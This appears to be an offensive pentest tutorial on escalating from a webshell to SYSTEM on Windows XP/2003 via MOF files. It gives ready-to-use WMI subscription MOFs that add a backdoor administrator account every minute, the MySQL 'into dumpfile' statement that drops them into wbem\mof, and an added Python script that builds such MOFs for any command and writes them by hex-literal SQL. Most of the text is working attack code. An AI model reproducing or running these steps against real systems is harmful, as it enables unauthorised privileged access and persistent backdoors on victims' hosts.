- After a webshell has been obtained, the current privileges only allow operating on the website's files; to gain control of the host itself, further privilege escalation is needed.
- First, MOF privilege escalation, demonstrated directly with a case study.
- Find a writable directory and upload a MOF file; here I uploaded it to C:/wmpub/nullevt.mof. The code is as follows:
#pragma namespace("\\\\.\\root\\subscription")
// Filter: matches the moment the local clock reports Second = 5, i.e. once every minute
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
// Consumer: JScript executed by the WMI service (running as SYSTEM) each time the filter fires
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")";
};
// Binding: ties filter and consumer together, making the subscription permanent
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
- Change the user-adding command before uploading. (Left unchanged, it adds a user named admin with the password admin.admin.) Note that the filter matches every time the local clock reaches second 5, so the command is executed once a minute for as long as the subscription exists.
- Run load_file together with into dumpfile to export the file to the correct location. This requires the MySQL account to hold the FILE privilege, secure_file_priv must not restrict writes to that directory, and mysqld must run with write access to System32\wbem\mof (normally as SYSTEM). The WMI service compiles MOF files dropped into that directory automatically only on Windows XP and Server 2003; later versions no longer do this, which is what limits the technique to those systems.
select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
- It ran successfully; list the users (the one I added is waitalone):
net user
- The user has been added successfully, but at this point it is still an ordinary user and has not been added to the administrators group.
- Next, change the statement to add the user to the administrators group and repeat the previous steps. Because Name is the key of __EventFilter and ActiveScriptEventConsumer, recompiling with the same names updates the existing subscription rather than creating a second one; use the same user name you chose in the first step (the sample below uses admin).
#pragma namespace("\\\\.\\root\\subscription")
// Same filter as before; the same Name means the existing instance is updated, not duplicated
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
// Consumer: only the command changes, now adding the user to the local administrators group
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admin /add\")";
};
// Binding: unchanged
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
- The user is now in the administrators group; connect with Remote Desktop:
mstsc /admin
- The subscription keeps running its command every minute until the __EventFilter, ActiveScriptEventConsumer and __FilterToConsumerBinding instances are deleted from root\subscription and the compiled file is removed from wbem\mof\good.
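The step that most often goes wrong when the command in the MOF above is edited by hand is the escaping: the command sits inside a JScript string literal, which in turn sits inside a MOF string literal, so every quote and backslash has to be escaped twice. As an added example (not code from the original post), the Python below generates a nullevt-style MOF for an arbitrary command with both layers applied, emits the MySQL statement that writes it as a hex literal so the file does not first have to be uploaded to a readable directory for load_file(), and decodes the command back out of an existing MOF, which is also handy when triaging a file found in wbem\mof\good. The hex-literal write variant, the sample commands and all helper names are assumptions made for illustration; the requirements on the MySQL side (FILE privilege, secure_file_priv, write access of mysqld to the directory) are the same as for the load_file() approach.

```python
"""Added example: build the nullevt-style WMI subscription from the post for
an arbitrary command, produce the MySQL statement that drops it, and decode
the command back out of a MOF. Not from the original post; helper names,
sample commands and the hex-literal write are assumptions for illustration."""
import re

# Skeleton of the MOF shown in the post. Braces are literal MOF syntax, so
# placeholders are filled in with one re.sub() pass instead of str.format().
MOF_TEMPLATE = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "__FILTER__";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = __SECOND__";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "__CONSUMER__";
    ScriptingEngine = "JScript";
    ScriptText = __SCRIPT__;
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''


def js_string(s):
    """Inner layer: wrap s as a JScript double-quoted string literal."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def mof_string(s):
    """Outer layer: wrap s as a MOF double-quoted literal. MOF uses C-style
    escapes, so backslashes and quotes produced by js_string() are escaped
    again and the newline between the two JScript statements becomes \\n."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n") + '"'


def build_mof(command, filter_name="filtP2", consumer_name="consPCSV2", second=5):
    """MOF that runs `command` via WScript.Shell whenever Win32_LocalTime
    reaches `second`, i.e. once a minute. Name is the WMI key, so recompiling
    with the same names updates the existing subscription instead of adding one."""
    for name in (filter_name, consumer_name):
        if not re.fullmatch(r"[A-Za-z0-9_]+", name):
            raise ValueError("instance names must match [A-Za-z0-9_]+: %r" % name)
    if not 0 <= second <= 59:
        raise ValueError("second must be in 0..59")
    script = 'var WSH = new ActiveXObject("WScript.Shell")\nWSH.run(%s)' % js_string(command)
    fields = {"FILTER": filter_name, "CONSUMER": consumer_name,
              "SECOND": str(second), "SCRIPT": mof_string(script)}
    return re.sub(r"__(FILTER|CONSUMER|SECOND|SCRIPT)__", lambda m: fields[m.group(1)], MOF_TEMPLATE)


def dumpfile_sql(mof_text, dest_path="c:/windows/system32/wbem/mof/nullevt.mof"):
    """MySQL statement writing mof_text byte-for-byte to dest_path. A hex
    literal needs no prior upload for load_file(); FILE privilege, a
    permissive secure_file_priv and mysqld write access are still required."""
    if "'" in dest_path or "\\" in dest_path:
        raise ValueError("use forward slashes and no quotes in dest_path")
    return "SELECT 0x%s INTO DUMPFILE '%s'" % (mof_text.encode("utf-8").hex(), dest_path)


def _unescape(literal):
    """Undo one layer of C-style escaping (\\\\, \\", \\n); shared by MOF and JScript."""
    out, i = [], 0
    while i < len(literal):
        if literal[i] == "\\" and i + 1 < len(literal):
            out.append("\n" if literal[i + 1] == "n" else literal[i + 1])
            i += 2
        else:
            out.append(literal[i])
            i += 1
    return "".join(out)


_LITERAL = r'"((?:[^"\\]|\\.)*)"'  # one double-quoted literal with escapes


def extract_command(mof_text):
    """Recover the command a nullevt-style MOF will run, or None if the
    consumer does not follow the WScript.Shell pattern used in the post."""
    m = re.search(r"ScriptText\s*=\s*" + _LITERAL + r"\s*;", mof_text)
    if not m:
        return None
    run = re.search(r"WSH\.run\(" + _LITERAL + r"\)", _unescape(m.group(1)))
    return _unescape(run.group(1)) if run else None


if __name__ == "__main__":
    mof = build_mof("net.exe user admin admin.admin /add")  # the post's default
    print(mof)
    print(dumpfile_sql(mof))
    print("will run:", extract_command(mof))
```

build_mof() with the default arguments reproduces the first MOF from the post character for character; passing a command containing quotes or backslashes shows why hand-editing the ScriptText line is error-prone, and extract_command() is the quickest way to confirm what a given MOF will actually execute before it is written into wbem\mof.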